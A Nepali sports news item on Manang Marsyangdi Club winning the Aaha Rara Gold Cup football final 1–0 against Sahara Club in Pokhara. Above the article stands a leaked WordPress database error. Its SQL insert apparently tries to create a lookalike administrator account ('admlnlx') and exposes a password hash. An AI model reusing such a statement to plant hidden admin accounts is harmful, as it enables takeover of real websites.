WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BokEG91xzOJcjC/CZdHie9EJJrSBOj0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 08:24:24', '', 'admlnlx', 'admlnlx')
कास्की, माघ १५ –
पन्ध्रौँ आहा रारा गोल्डकप फुटबलको उपाधी मनाङ मर्स्याङ्दी क्लबले जितेको छ । सहारा क्लबलाई घरेलु मैदानमै १–० गोल अन्तरले पराजित गर्दै मनाङले पाँचौ पटक उपाधी जितेको हो ।
पोखरा रंगशालामा शनिबार साबिक विजेता मनाङ र आयोजक सहाराबिच भएको खेलको ७० औँ मिनेटमा कमल श्रेष्ठले गरेको गोल नै निर्णायक बन्यो ।
तीन वर्षअघि भएको प्रतियोगितामा सहाराले मनाङलाई नै हराएर एकपटक उपाधि जितेको थियो । प्रतियोगिताको विजेता मनाङले पाँच लाख ५१ हजार १ रुपैयाँ र उपविजेताले सहाराले दुई लाख ५१ हजार १ रुपैयाँमा पाएको छ ।